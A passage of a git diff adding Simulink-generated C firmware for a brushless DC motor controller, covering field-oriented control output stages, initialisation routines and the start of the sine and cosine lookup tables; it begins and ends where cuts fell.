PI_clamp_fixdt_Reset(&rtDW->PI_clamp_fixdt_i); + + /* End of SystemReset for SubSystem: '/PI_clamp_fixdt' */ + + /* End of SystemReset for SubSystem: '/Vd_Calculation' */ + } + + /* Outputs for IfAction SubSystem: '/Vd_Calculation' incorporates: + * ActionPort: '/Action Port' + */ + /* Gain: '/toNegative' */ + rtb_Saturation = (int16_T)-rtDW->Divide3; + + /* Switch: '/Switch2' incorporates: + * RelationalOperator: '/LowerRelop1' + * RelationalOperator: '/UpperRelop' + * Switch: '/Switch' + */ + if (rtb_Saturation > rtDW->i_max) { + rtb_Saturation = rtDW->i_max; + } else { + if (rtb_Saturation < rtDW->Gain4) { + /* Switch: '/Switch' */ + rtb_Saturation = rtDW->Gain4; + } + } + + /* End of Switch: '/Switch2' */ + + /* Sum: '/Sum3' */ + rtb_Gain3 = rtb_Saturation - rtDW->DataTypeConversion[1]; + if (rtb_Gain3 > 32767) { + rtb_Gain3 = 32767; + } else { + if (rtb_Gain3 < -32768) { + rtb_Gain3 = -32768; + } + } + + /* Outputs for Atomic SubSystem: '/PI_clamp_fixdt' */ + PI_clamp_fixdt((int16_T)rtb_Gain3, rtP->cf_idKp, rtP->cf_idKi, 0, + rtDW->Vd_max1, rtDW->Gain3, 0, &rtDW->Switch1, + &rtDW->PI_clamp_fixdt_i); + + /* End of Outputs for SubSystem: '/PI_clamp_fixdt' */ + + /* End of Outputs for SubSystem: '/Vd_Calculation' */ + } + + /* End of If: '/If1' */ + /* End of Outputs for SubSystem: '/FOC_Enabled' */ + } + + /* End of If: '/If1' */ + /* End of Outputs for SubSystem: '/FOC' */ + } + } + + /* End of Chart: '/Task_Scheduler' */ + + /* If: '/If2' incorporates: + * Constant: '/z_ctrlTypSel' + * Constant: '/CTRL_COMM1' + * RelationalOperator: '/Relational Operator6' + * Switch: '/Switch2' + */ + rtb_Sum2_h = rtDW->If2_ActiveSubsystem; + UnitDelay3 = -1; + if (rtP->z_ctrlTypSel == 2) { + rtb_Saturation = rtDW->Merge; + UnitDelay3 = 0; + } else { + rtb_Saturation = rtDW->Merge1; + } + + rtDW->If2_ActiveSubsystem = UnitDelay3; + if ((rtb_Sum2_h != UnitDelay3) && (rtb_Sum2_h == 0)) { + /* Disable for Outport: '/V_phaABC_FOC' */ + rtDW->Gain4_e[0] = 0; + rtDW->Gain4_e[1] = 0; + rtDW->Gain4_e[2] = 0; + } + + if (UnitDelay3 == 0) { + /* Outputs for IfAction SubSystem: '/Clarke_Park_Transform_Inverse' incorporates: + * ActionPort: '/Action Port' + */ + /* Sum: '/Sum6' incorporates: + * Product: '/Divide1' + * Product: '/Divide4' + */ + rtb_Gain3 = (int16_T)((rtDW->Switch1 * rtDW->r_cos_M1) >> 14) - (int16_T) + ((rtDW->Merge * rtDW->r_sin_M1) >> 14); + if (rtb_Gain3 > 32767) { + rtb_Gain3 = 32767; + } else { + if (rtb_Gain3 < -32768) { + rtb_Gain3 = -32768; + } + } + + /* Sum: '/Sum1' incorporates: + * Product: '/Divide2' + * Product: '/Divide3' + */ + rtb_Sum1_jt = (int16_T)((rtDW->Switch1 * rtDW->r_sin_M1) >> 14) + (int16_T) + ((rtDW->Merge * rtDW->r_cos_M1) >> 14); + if (rtb_Sum1_jt > 32767) { + rtb_Sum1_jt = 32767; + } else { + if (rtb_Sum1_jt < -32768) { + rtb_Sum1_jt = -32768; + } + } + + /* Gain: '/Gain1' incorporates: + * Sum: '/Sum1' + */ + rtb_Sum1_jt *= 14189; + + /* Sum: '/Sum6' incorporates: + * Gain: '/Gain1' + * Gain: '/Gain3' + * Sum: '/Sum6' + */ + rtb_Sum1_jt = (((rtb_Sum1_jt < 0 ? 16383 : 0) + rtb_Sum1_jt) >> 14) - + ((int16_T)(((int16_T)rtb_Gain3 < 0) + (int16_T)rtb_Gain3) >> 1); + if (rtb_Sum1_jt > 32767) { + rtb_Sum1_jt = 32767; + } else { + if (rtb_Sum1_jt < -32768) { + rtb_Sum1_jt = -32768; + } + } + + /* Sum: '/Sum2' incorporates: + * Sum: '/Sum6' + * Sum: '/Sum6' + */ + rtb_Switch1 = -(int16_T)rtb_Gain3 - (int16_T)rtb_Sum1_jt; + if (rtb_Switch1 > 32767) { + rtb_Switch1 = 32767; + } else { + if (rtb_Switch1 < -32768) { + rtb_Switch1 = -32768; + } + } + + /* MinMax: '/MinMax1' incorporates: + * Sum: '/Sum2' + * Sum: '/Sum6' + * Sum: '/Sum6' + */ + DataTypeConversion2 = (int16_T)rtb_Gain3; + if (!((int16_T)rtb_Gain3 < (int16_T)rtb_Sum1_jt)) { + DataTypeConversion2 = (int16_T)rtb_Sum1_jt; + } + + if (!(DataTypeConversion2 < (int16_T)rtb_Switch1)) { + DataTypeConversion2 = (int16_T)rtb_Switch1; + } + + /* MinMax: '/MinMax2' incorporates: + * Sum: '/Sum2' + * Sum: '/Sum6' + * Sum: '/Sum6' + */ + rtb_Saturation1 = (int16_T)rtb_Gain3; + if (!((int16_T)rtb_Gain3 > (int16_T)rtb_Sum1_jt)) { + rtb_Saturation1 = (int16_T)rtb_Sum1_jt; + } + + if (!(rtb_Saturation1 > (int16_T)rtb_Switch1)) { + rtb_Saturation1 = (int16_T)rtb_Switch1; + } + + /* Sum: '/Add' incorporates: + * MinMax: '/MinMax1' + * MinMax: '/MinMax2' + */ + rtb_Sum1 = DataTypeConversion2 + rtb_Saturation1; + if (rtb_Sum1 > 32767) { + rtb_Sum1 = 32767; + } else { + if (rtb_Sum1 < -32768) { + rtb_Sum1 = -32768; + } + } + + /* Gain: '/Gain2' incorporates: + * Sum: '/Add' + */ + rtb_Merge1 = (int16_T)(rtb_Sum1 >> 1); + + /* Sum: '/Add1' incorporates: + * Sum: '/Sum6' + */ + rtb_Gain3 = (int16_T)rtb_Gain3 - rtb_Merge1; + if (rtb_Gain3 > 32767) { + rtb_Gain3 = 32767; + } else { + if (rtb_Gain3 < -32768) { + rtb_Gain3 = -32768; + } + } + + /* Gain: '/Gain4' incorporates: + * Sum: '/Add1' + */ + rtDW->Gain4_e[0] = (int16_T)((18919 * rtb_Gain3) >> 14); + + /* Sum: '/Add1' incorporates: + * Sum: '/Sum6' + */ + rtb_Gain3 = (int16_T)rtb_Sum1_jt - rtb_Merge1; + if (rtb_Gain3 > 32767) { + rtb_Gain3 = 32767; + } else { + if (rtb_Gain3 < -32768) { + rtb_Gain3 = -32768; + } + } + + /* Gain: '/Gain4' incorporates: + * Sum: '/Add1' + */ + rtDW->Gain4_e[1] = (int16_T)((18919 * rtb_Gain3) >> 14); + + /* Sum: '/Add1' incorporates: + * Sum: '/Sum2' + */ + rtb_Gain3 = (int16_T)rtb_Switch1 - rtb_Merge1; + if (rtb_Gain3 > 32767) { + rtb_Gain3 = 32767; + } else { + if (rtb_Gain3 < -32768) { + rtb_Gain3 = -32768; + } + } + + /* Gain: '/Gain4' incorporates: + * Sum: '/Add1' + */ + rtDW->Gain4_e[2] = (int16_T)((18919 * rtb_Gain3) >> 14); + + /* End of Outputs for SubSystem: '/Clarke_Park_Transform_Inverse' */ + } + + /* End of If: '/If2' */ + + /* If: '/If' incorporates: + * Constant: '/vec_hallToPos' + * Constant: '/z_ctrlTypSel' + * Constant: '/CTRL_COMM2' + * Constant: '/CTRL_COMM3' + * Inport: '/V_phaABC_FOC_in' + * Logic: '/Logical Operator1' + * Logic: '/Logical Operator2' + * LookupNDDirect: '/z_commutMap_M1' + * RelationalOperator: '/Relational Operator1' + * RelationalOperator: '/Relational Operator2' + * Selector: '/Selector' + * + * About '/z_commutMap_M1': + * 2-dimensional Direct Look-Up returning a Column + */ + if (rtb_LogicalOperator && (rtP->z_ctrlTypSel == 2)) { + /* Outputs for IfAction SubSystem: '/FOC_Method' incorporates: + * ActionPort: '/Action Port' + */ + DataTypeConversion2 = rtDW->Gain4_e[0]; + rtb_Saturation1 = rtDW->Gain4_e[1]; + rtb_Merge1 = rtDW->Gain4_e[2]; + + /* End of Outputs for SubSystem: '/FOC_Method' */ + } else if (rtb_LogicalOperator && (rtP->z_ctrlTypSel == 1)) { + /* Outputs for IfAction SubSystem: '/SIN_Method' incorporates: + * ActionPort: '/Action Port' + */ + /* Switch: '/Switch_PhaAdv' incorporates: + * Constant: '/b_fieldWeakEna' + * Product: '/Divide2' + * Product: '/Divide3' + * Sum: '/Sum3' + */ + if (rtP->b_fieldWeakEna) { + /* Sum: '/Sum3' incorporates: + * Product: '/Product2' + */ + DataTypeConversion2 = (int16_T)((int16_T)((int16_T)(rtDW->Divide3 * + rtDW->Switch2_e) << 2) + rtb_Merge_m); + DataTypeConversion2 -= (int16_T)((int16_T)((int16_T)div_nde_s32_floor + (DataTypeConversion2, 23040) * 360) << 6); + } else { + DataTypeConversion2 = rtb_Merge_m; + } + + /* End of Switch: '/Switch_PhaAdv' */ + + /* PreLookup: '/a_elecAngle_XA' */ + Sum = plook_u8s16_evencka(DataTypeConversion2, 0, 128U, 180U); + + /* Product: '/Divide2' incorporates: + * Interpolation_n-D: '/r_sin3PhaA_M1' + * Interpolation_n-D: '/r_sin3PhaB_M1' + * Interpolation_n-D: '/r_sin3PhaC_M1' + */ + DataTypeConversion2 = (int16_T)((rtb_Saturation * + rtConstP.r_sin3PhaA_M1_Table[Sum]) >> 14); + rtb_Saturation1 = (int16_T)((rtb_Saturation * + rtConstP.r_sin3PhaB_M1_Table[Sum]) >> 14); + rtb_Merge1 = (int16_T)((rtb_Saturation * rtConstP.r_sin3PhaC_M1_Table[Sum]) >> + 14); + + /* End of Outputs for SubSystem: '/SIN_Method' */ + } else { + /* Outputs for IfAction SubSystem: '/COM_Method' incorporates: + * ActionPort: '/Action Port' + */ + if (rtConstP.vec_hallToPos_Value[Sum] > 5) { + /* LookupNDDirect: '/z_commutMap_M1' + * + * About '/z_commutMap_M1': + * 2-dimensional Direct Look-Up returning a Column + */ + rtb_Sum2_h = 5; + } else if (rtConstP.vec_hallToPos_Value[Sum] < 0) { + /* LookupNDDirect: '/z_commutMap_M1' + * + * About '/z_commutMap_M1': + * 2-dimensional Direct Look-Up returning a Column + */ + rtb_Sum2_h = 0; + } else { + /* LookupNDDirect: '/z_commutMap_M1' incorporates: + * Constant: '/vec_hallToPos' + * Selector: '/Selector' + * + * About '/z_commutMap_M1': + * 2-dimensional Direct Look-Up returning a Column + */ + rtb_Sum2_h = rtConstP.vec_hallToPos_Value[Sum]; + } + + /* LookupNDDirect: '/z_commutMap_M1' incorporates: + * Constant: '/vec_hallToPos' + * Selector: '/Selector' + * + * About '/z_commutMap_M1': + * 2-dimensional Direct Look-Up returning a Column + */ + rtb_Sum1_jt = rtb_Sum2_h * 3; + + /* Product: '/Divide2' incorporates: + * LookupNDDirect: '/z_commutMap_M1' + * + * About '/z_commutMap_M1': + * 2-dimensional Direct Look-Up returning a Column + */ + DataTypeConversion2 = (int16_T)(rtb_Saturation * + rtConstP.z_commutMap_M1_table[rtb_Sum1_jt]); + rtb_Saturation1 = (int16_T)(rtConstP.z_commutMap_M1_table[1 + rtb_Sum1_jt] * + rtb_Saturation); + rtb_Merge1 = (int16_T)(rtConstP.z_commutMap_M1_table[2 + rtb_Sum1_jt] * + rtb_Saturation); + + /* End of Outputs for SubSystem: '/COM_Method' */ + } + + /* End of If: '/If' */ + + /* Outport: '/DC_phaA' incorporates: + * DataTypeConversion: '/Data Type Conversion6' + */ + rtY->DC_phaA = (int16_T)(DataTypeConversion2 >> 4); + + /* Outport: '/DC_phaB' incorporates: + * DataTypeConversion: '/Data Type Conversion6' + */ + rtY->DC_phaB = (int16_T)(rtb_Saturation1 >> 4); + + /* Update for UnitDelay: '/UnitDelay3' incorporates: + * Inport: '/b_hallA ' + */ + rtDW->UnitDelay3_DSTATE_fy = rtU->b_hallA; + + /* Update for UnitDelay: '/UnitDelay1' incorporates: + * Inport: '/b_hallB' + */ + rtDW->UnitDelay1_DSTATE = rtU->b_hallB; + + /* Update for UnitDelay: '/UnitDelay2' incorporates: + * Inport: '/b_hallC' + */ + rtDW->UnitDelay2_DSTATE_f = rtU->b_hallC; + + /* Update for UnitDelay: '/UnitDelay3' */ + rtDW->UnitDelay3_DSTATE = rtb_Switch1_l; + + /* Update for UnitDelay: '/UnitDelay4' */ + rtDW->UnitDelay4_DSTATE_e = Abs5; + + /* Update for UnitDelay: '/UnitDelay2' incorporates: + * UnitDelay: '/UnitDelay6' + */ + rtDW->UnitDelay2_DSTATE_c = rtDW->UnitDelay6_DSTATE; + + /* Update for UnitDelay: '/UnitDelay5' */ + rtDW->UnitDelay5_DSTATE_m = rtb_RelationalOperator4_d; + + /* Update for UnitDelay: '/UnitDelay6' */ + rtDW->UnitDelay6_DSTATE = rtb_UnitDelay5_e; + + /* Update for UnitDelay: '/UnitDelay4' */ + rtDW->UnitDelay4_DSTATE_eu = rtb_Saturation; + + /* Outport: '/DC_phaC' incorporates: + * DataTypeConversion: '/Data Type Conversion6' + */ + rtY->DC_phaC = (int16_T)(rtb_Merge1 >> 4); + + /* Outport: '/n_mot' incorporates: + * DataTypeConversion: '/Data Type Conversion1' + */ + rtY->n_mot = (int16_T)(Switch2 >> 4); + + /* Outport: '/a_elecAngle' incorporates: + * DataTypeConversion: '/Data Type Conversion3' + */ + rtY->a_elecAngle = (int16_T)(rtb_Merge_m >> 6); + + /* End of Outputs for SubSystem: '/BLDC_controller' */ + + /* Outport: '/iq' */ + rtY->iq = rtDW->DataTypeConversion[0]; + + /* Outport: '/id' */ + rtY->id = rtDW->DataTypeConversion[1]; +} + +/* Model initialize function */ +void BLDC_controller_initialize(RT_MODEL *const rtM) +{ + P *rtP = ((P *) rtM->defaultParam); + DW *rtDW = ((DW *) rtM->dwork); + + /* Start for Atomic SubSystem: '/BLDC_controller' */ + /* Start for If: '/If1' */ + rtDW->If1_ActiveSubsystem = -1; + + /* Start for IfAction SubSystem: '/Clarke_Park_Transform_Forward' */ + /* Start for If: '/If2' */ + rtDW->If2_ActiveSubsystem_a = -1; + + /* End of Start for SubSystem: '/Clarke_Park_Transform_Forward' */ + + /* Start for Chart: '/Task_Scheduler' incorporates: + * SubSystem: '/F03_Control_Mode_Manager' + */ + /* Start for If: '/If2' */ + rtDW->If2_ActiveSubsystem_f = -1; + + /* Start for Chart: '/Task_Scheduler' incorporates: + * SubSystem: '/Motor_Limitations' + */ + /* Start for If: '/If1' */ + rtDW->If1_ActiveSubsystem_o = -1; + + /* Start for IfAction SubSystem: '/Motor_Limitations_Enabled' */ + /* Start for SwitchCase: '/Switch Case' */ + rtDW->SwitchCase_ActiveSubsystem_d = -1; + + /* End of Start for SubSystem: '/Motor_Limitations_Enabled' */ + + /* Start for Chart: '/Task_Scheduler' incorporates: + * SubSystem: '/FOC' + */ + /* Start for If: '/If1' */ + rtDW->If1_ActiveSubsystem_j = -1; + + /* Start for IfAction SubSystem: '/FOC_Enabled' */ + /* Start for SwitchCase: '/Switch Case' */ + rtDW->SwitchCase_ActiveSubsystem = -1; + + /* Start for If: '/If1' */ + rtDW->If1_ActiveSubsystem_a = -1; + + /* End of Start for SubSystem: '/FOC_Enabled' */ + + /* Start for If: '/If2' */ + rtDW->If2_ActiveSubsystem = -1; + + /* End of Start for SubSystem: '/BLDC_controller' */ + + /* SystemInitialize for Atomic SubSystem: '/BLDC_controller' */ + /* InitializeConditions for UnitDelay: '/UnitDelay3' */ + rtDW->UnitDelay3_DSTATE = rtP->z_maxCntRst; + + /* InitializeConditions for UnitDelay: '/UnitDelay2' */ + rtDW->UnitDelay2_DSTATE_c = true; + + /* SystemInitialize for IfAction SubSystem: '/Raw_Motor_Speed_Estimation' */ + /* SystemInitialize for Outport: '/z_counter' */ + rtDW->z_counterRawPrev = rtP->z_maxCntRst; + + /* End of SystemInitialize for SubSystem: '/Raw_Motor_Speed_Estimation' */ + + /* SystemInitialize for Atomic SubSystem: '/Counter' */ + Counter_Init(&rtDW->Counter_e, rtP->z_maxCntRst); + + /* End of SystemInitialize for SubSystem: '/Counter' */ + + /* SystemInitialize for Chart: '/Task_Scheduler' incorporates: + * SubSystem: '/F02_Diagnostics' + */ + + /* SystemInitialize for IfAction SubSystem: '/Diagnostics_Enabled' */ + + /* SystemInitialize for Atomic SubSystem: '/Debounce_Filter' */ + Debounce_Filter_Init(&rtDW->Debounce_Filter_k); + + /* End of SystemInitialize for SubSystem: '/Debounce_Filter' */ + + /* End of SystemInitialize for SubSystem: '/Diagnostics_Enabled' */ + + /* SystemInitialize for Chart: '/Task_Scheduler' incorporates: + * SubSystem: '/F03_Control_Mode_Manager' + */ + /* SystemInitialize for IfAction SubSystem: '/Open_Mode' */ + /* SystemInitialize for Atomic SubSystem: '/rising_edge_init' */ + /* InitializeConditions for UnitDelay: '/UnitDelay' */ + rtDW->UnitDelay_DSTATE_b = true; + + /* End of SystemInitialize for SubSystem: '/rising_edge_init' */ + /* End of SystemInitialize for SubSystem: '/Open_Mode' */ + + /* SystemInitialize for Chart: '/Task_Scheduler' incorporates: + * SubSystem: '/Motor_Limitations' + */ + /* SystemInitialize for IfAction SubSystem: '/Motor_Limitations_Enabled' */ + + /* SystemInitialize for IfAction SubSystem: '/Voltage_Mode_Protection' */ + + /* SystemInitialize for Atomic SubSystem: '/I_backCalc_fixdt' */ + I_backCalc_fixdt_Init(&rtDW->I_backCalc_fixdt_i, 65536000); + + /* End of SystemInitialize for SubSystem: '/I_backCalc_fixdt' */ + + /* SystemInitialize for Atomic SubSystem: '/I_backCalc_fixdt1' */ + I_backCalc_fixdt_Init(&rtDW->I_backCalc_fixdt1, 65536000); + + /* End of SystemInitialize for SubSystem: '/I_backCalc_fixdt1' */ + + /* End of SystemInitialize for SubSystem: '/Voltage_Mode_Protection' */ + + /* SystemInitialize for IfAction SubSystem: '/Torque_Mode_Protection' */ + + /* SystemInitialize for Atomic SubSystem: '/I_backCalc_fixdt' */ + I_backCalc_fixdt_Init(&rtDW->I_backCalc_fixdt_j, 58982400); + + /* End of SystemInitialize for SubSystem: '/I_backCalc_fixdt' */ + + /* End of SystemInitialize for SubSystem: '/Torque_Mode_Protection' */ + + /* SystemInitialize for Outport: '/Vd_max' */ + rtDW->Vd_max1 = 14400; + + /* SystemInitialize for Outport: '/Vd_min' */ + rtDW->Gain3 = -14400; + + /* SystemInitialize for Outport: '/Vq_max' */ + rtDW->Vq_max_M1 = 14400; + + /* SystemInitialize for Outport: '/Vq_min' */ + rtDW->Gain5 = -14400; + + /* SystemInitialize for Outport: '/id_max' */ + rtDW->i_max = 12000; + + /* SystemInitialize for Outport: '/id_min' */ + rtDW->Gain4 = -12000; + + /* SystemInitialize for Outport: '/iq_max' */ + rtDW->Divide1_n = 12000; + + /* SystemInitialize for Outport: '/iq_min' */ + rtDW->Gain1 = -12000; + + /* End of SystemInitialize for SubSystem: '/Motor_Limitations_Enabled' */ + + /* SystemInitialize for Chart: '/Task_Scheduler' incorporates: + * SubSystem: '/FOC' + */ + + /* SystemInitialize for IfAction SubSystem: '/FOC_Enabled' */ + + /* SystemInitialize for IfAction SubSystem: '/Speed_Mode' */ + + /* SystemInitialize for Atomic SubSystem: '/PI_clamp_fixdt' */ + PI_clamp_fixdt_d_Init(&rtDW->PI_clamp_fixdt_l4); + + /* End of SystemInitialize for SubSystem: '/PI_clamp_fixdt' */ + + /* End of SystemInitialize for SubSystem: '/Speed_Mode' */ + + /* SystemInitialize for IfAction SubSystem: '/Torque_Mode' */ + + /* SystemInitialize for Atomic SubSystem: '/PI_clamp_fixdt' */ + PI_clamp_fixdt_f_Init(&rtDW->PI_clamp_fixdt_kh); + + /* End of SystemInitialize for SubSystem: '/PI_clamp_fixdt' */ + + /* End of SystemInitialize for SubSystem: '/Torque_Mode' */ + + /* SystemInitialize for IfAction SubSystem: '/Vd_Calculation' */ + + /* SystemInitialize for Atomic SubSystem: '/PI_clamp_fixdt' */ + PI_clamp_fixdt_Init(&rtDW->PI_clamp_fixdt_i); + + /* End of SystemInitialize for SubSystem: '/PI_clamp_fixdt' */ + + /* End of SystemInitialize for SubSystem: '/Vd_Calculation' */ + + /* End of SystemInitialize for SubSystem: '/FOC_Enabled' */ + + /* End of SystemInitialize for SubSystem: '/BLDC_controller' */ +} + +/* + * File trailer for generated code. + * + * [EOF] + */ diff --git a/body/board/bldc/BLDC_controller_data.c b/body/board/bldc/BLDC_controller_data.c new file mode 100644 index 000000000..626c53719 --- /dev/null +++ b/body/board/bldc/BLDC_controller_data.c @@ -0,0 +1,386 @@ +/* + * File: BLDC_controller_data.c + * + * Code generated for Simulink model 'BLDC_controller'. + * + * Model version : 1.1297 + * Simulink Coder version : 8.13 (R2017b) 24-Jul-2017 + * C/C++ source code generated on : Sun Mar 6 11:02:11 2022 + * + * Target selection: ert.tlc + * Embedded hardware selection: ARM Compatible->ARM Cortex + * Emulation hardware selection: + * Differs from embedded hardware (MATLAB Host) + * Code generation objectives: + * 1. Execution efficiency + * 2. RAM efficiency + * Validation result: Not run + */ + +#include "BLDC_controller.h" + +/* Constant parameters (auto storage) */ +const ConstP rtConstP = { + /* Computed Parameter: r_sin_M1_Table + * Referenced by: '/r_sin_M1' + */ + { 8192, 8682, 9162, 9630, 10087, 10531, 10963, 11381, 11786, 12176, 12551, + 12911, 13255, 13583, 13894, 14189, 14466, 14726, 14968, 15191, 15396, 15582, + 15749, 15897, 16026, 16135, 16225, 16294, 16344, 16374, 16384, 16374, 16344, + 16294, 16225, 16135, 16026, 15897, 15749, 15582, 15396, 15191, 14968, 14726, + 14466, 14189, 13894, 13583, 13255, 12911, 12551, 12176, 11786, 11381, 10963, + 10531, 10087, 9630, 9162, 8682, 8192, 7692, 7182, 6664, 6138, 5604, 5063, + 4516, 3964, 3406, 2845, 2280, 1713, 1143, 572, 0, -572, -1143, -1713, -2280, + -2845, -3406, -3964, -4516, -5063, -5604, -6138, -6664, -7182, -7692, -8192, + -8682, -9162, -9630, -10087, -10531, -10963, -11381, -11786, -12176, -12551, + -12911, -13255, -13583, -13894, -14189, -14466, -14726, -14968, -15191, + -15396, -15582, -15749, -15897, -16026, -16135, -16225, -16294, -16344, + -16374, -16384, -16374, -16344, -16294, -16225, -16135, -16026, -15897, + -15749, -15582, -15396, -15191, -14968, -14726, -14466, -14189, -13894, + -13583, -13255, -12911, -12551, -12176, -11786, -11381, -10963, -10531, + -10087, -9630, -9162, -8682, -8192, -7692, -7182, -6664, -6138, -5604, -5063, + -4516, -3964, -3406, -2845, -2280, -1713, -1143, -572, 0, 572, 1143, 1713, + 2280, 2845, 3406, 3964, 4516, 5063, 5604, 6138, 6664, 7182, 7692, 8192 }, + + /* Computed Parameter: r_cos_M1_Table + * Referenced by: '/r_cos_M1' + */ + { 14189, 13894, 13583, 13255, 12911, 12551, 12176, 11786, 11381, 10963, 10531, + 10087, 9630, 9162, 8682, 8192, 7692, 7182, 6664, 6138, 5604, 5063, 4516, + 3964, 3406, 2845, 2280, 1713, 1143, 572, 0, -572, -1143, -1713, -2280, -2845, + -3406, -3964, -4516, -5063, -5604, -6138, -6664, -7182, -7692, -8192, -8682, + -9162, -9630, -10087, -10531, -10963, -11381, -11786, -12176, -12551, -12911, + -13255, -13583, -13894, -14189, -14466, -14726, -14968, -15191, -15396, + -15582, -15749, -15897, -16026, -16135, -16225, -16294, -16344, -16374, + -16384, -16374, -16344, -16294, -16225, -16135, -16026, -15897, -15749, + -15582, -15396, -15191, -14968, -14726, -14466, -14189, -13894, -13583, + -13255, -12911, -12551, -12176, -11786, -11381, -10963, -10531, -10087, + -9630, -9162, -8682, -8192, -7692, -7182, -6664, -6138, -5604, -5063, -4516, + -3964, -3406, -2845, -2280, -1713, -1143, -572, 0, 572, 1143, 1713, 2280, + 2845, 3406, 3964, 4516, 5063, 5604, 6138, 6664, 7182, 7692, 8192, 8682, 9162, + 9630, 10087, 10531, 10963, 11381, 11786, 12176, 12551, 12911, 13255, 13583, + 13894, 14189, 14466, 14726, 14968, 15191, 15396, 15582, 15749, 15897, 16026, + 16135, 16225, 16294, 16344, 16374, 16384, 16374, 16344, 16294, 16225, 16135, + 16026, 15897, 15749, 15582, 15396, 15191, 14968, 14726, 14466, 14189 }, + + /* Computed Parameter: r_sin3PhaA_M1_Table + * Referenced by: '/r_sin3PhaA_M1' + */ + { -13091, -13634, -14126, -14565, -14953, -15289, -15577, -15816, -16009, + -16159, -16269, -16340, -16377, -16383, -16362, -16317, -16253, -16172, + -16079, -15977, -15870, -15762, -15656, -15555, -15461, -15377, -15306, + -15248, -15206, -15180, -15172, -15180, -15206, -15248, -15306, -15377, + -15461, -15555, -15656, -15762, -15870, -15977, -16079, -16172, -16253, + -16317, -16362, -16383, -16377, -16340, -16269, -16159, -16009, -15816, + -15577, -15289, -14953, -14565, -14126, -13634, -13091, -12496, -11849, + -11154, -10411, -9623, -8791, -7921, -7014, -6075, -5107, -4115, -3104, + -2077, -1041, 0, 1041, 2077, 3104, 4115, 5107, 6075, 7014, 7921, 8791, 9623, + 10411, 11154, 11849, 12496, 13091, 13634, 14126, 14565, 14953, 15289, 15577, + 15816, 16009, 16159, 16269, 16340, 16377, 16383, 16362, 16317, 16253, 16172, + 16079, 15977, 15870, 15762, 15656, 15555, 15461, 15377, 15306, 15248, 15206, + 15180, 15172, 15180, 15206, 15248, 15306, 15377, 15461, 15555, 15656, 15762, + 15870, 15977, 16079, 16172, 16253, 16317, 16362, 16383, 16377, 16340, 16269, + 16159, 16009, 15816, 15577, 15289, 14953, 14565, 14126, 13634, 13091, 12496, + 11849, 11154, 10411, 9623, 8791, 7921, 7014, 6075, 5107, 4115, 3104, 2077, + 1041, 0, -1041, -2077, -3104, -4115, -5107, -6075, -7014, -7921, -8791, + -9623, -10411, -11154, -11849, -12496, -13091 }, + + /* Computed Parameter: r_sin3PhaB_M1_Table + * Referenced by: '/r_sin3PhaB_M1' + */ + { 15172, 15180, 15206, 15248, 15306, 15377, 15461, 15555, 15656, 15762, 15870, + 15977, 16079, 16172, 16253, 16317, 16362, 16383, 16377, 16340, 16269, 16159, + 16009, 15816, 15577, 15289, 14953, 14565, 14126, 13634, 13091, 12496, 11849, + 11154, 10411, 9623, 8791, 7921, 7014, 6075, 5107, 4115, 3104, 2077, 1041, 0, + -1041, -2077, -3104, -4115, -5107, -6075, -7014, -7921, -8791, -9623, -10411, + -11154, -11849, -12496, -13091, -13634, -14126, -14565, -14953, -15289, + -15577, -15816, -16009, -16159, -16269, -16340, -16377, -16383, -16362, + -16317, -16253, -16172, -16079, -15977, -15870, -15762, -15656, -15555, + -15461, -15377, -15306, -15248, -15206, -15180, -15172, -15180, -15206, + -15248, -15306, -15377, -15461, -15555, -15656, -15762, -15870, -15977, + -16079, -16172, -16253, -16317, -16362, -16383, -16377, -16340, -16269, + -16159, -16009, -15816, -15577, -15289, -14953, -14565, -14126, -13634, + -13091, -12496, -11849, -11154, -10411, -9623, -8791, -7921, -7014, -6075, + -5107, -4115, -3104, -2077, -1041, 0, 1041, 2077, 3104, 4115, 5107, 6075, + 7014, 7921, 8791, 9623, 10411, 11154, 11849, 12496, 13091, 13634, 14126, + 14565, 14953, 15289, 15577, 15816, 16009, 16159, 16269, 16340, 16377, 16383, + 16362, 16317, 16253, 16172, 16079, 15977, 15870, 15762, 15656, 15555, 15461, + 15377, 15306, 15248, 15206, 15180, 15172 }, + + /* Computed Parameter: r_sin3PhaC_M1_Table + * Referenced by: '/r_sin3PhaC_M1' + */ + { -13091, -12496, -11849, -11154, -10411, -9623, -8791, -7921, -7014, -6075, + -5107, -4115, -3104, -2077, -1041, 0, 1041, 2077, 3104, 4115, 5107, 6075, + 7014, 7921, 8791, 9623, 10411, 11154, 11849, 12496, 13091, 13634, 14126, + 14565, 14953, 15289, 15577, 15816, 16009, 16159, 16269, 16340, 16377, 16383, + 16362, 16317, 16253, 16172, 16079, 15977, 15870, 15762, 15656, 15555, 15461, + 15377, 15306, 15248, 15206, 15180, 15172, 15180, 15206, 15248, 15306, 15377, + 15461, 15555, 15656, 15762, 15870, 15977, 16079, 16172, 16253, 16317, 16362, + 16383, 16377, 16340, 16269, 16159, 16009, 15816, 15577, 15289, 14953, 14565, + 14126, 13634, 13091, 12496, 11849, 11154, 10411, 9623, 8791, 7921, 7014, + 6075, 5107, 4115, 3104, 2077, 1041, 0, -1041, -2077, -3104, -4115, -5107, + -6075, -7014, -7921, -8791, -9623, -10411, -11154, -11849, -12496, -13091, + -13634, -14126, -14565, -14953, -15289, -15577, -15816, -16009, -16159, + -16269, -16340, -16377, -16383, -16362, -16317, -16253, -16172, -16079, + -15977, -15870, -15762, -15656, -15555, -15461, -15377, -15306, -15248, + -15206, -15180, -15172, -15180, -15206, -15248, -15306, -15377, -15461, + -15555, -15656, -15762, -15870, -15977, -16079, -16172, -16253, -16317, + -16362, -16383, -16377, -16340, -16269, -16159, -16009, -15816, -15577, + -15289, -14953, -14565, -14126, -13634, -13091 }, + + /* Computed Parameter: iq_maxSca_M1_Table + * Referenced by: '/iq_maxSca_M1' + */ + { 65535U, 65523U, 65484U, 65418U, 65326U, 65207U, 65062U, 64890U, 64691U, + 64465U, 64211U, 63930U, 63620U, 63281U, 62913U, 62516U, 62088U, 61630U, + 61140U, 60618U, 60062U, 59473U, 58848U, 58187U, 57489U, 56752U, 55974U, + 55155U, 54291U, 53381U, 52422U, 51413U, 50349U, 49227U, 48043U, 46792U, + 45470U, 44069U, 42581U, 40997U, 39307U, 37494U, 35541U, 33422U, 31105U, + 28540U, 25655U, 22323U, 18304U, 12974U }, + + /* Computed Parameter: z_commutMap_M1_table + * Referenced by: '/z_commutMap_M1' + */ + { -1, 1, 0, -1, 0, 1, 0, -1, 1, 1, -1, 0, 1, 0, -1, 0, 1, -1 }, + + /* Computed Parameter: vec_hallToPos_Value + * Referenced by: '/vec_hallToPos' + */ + { 0, 2, 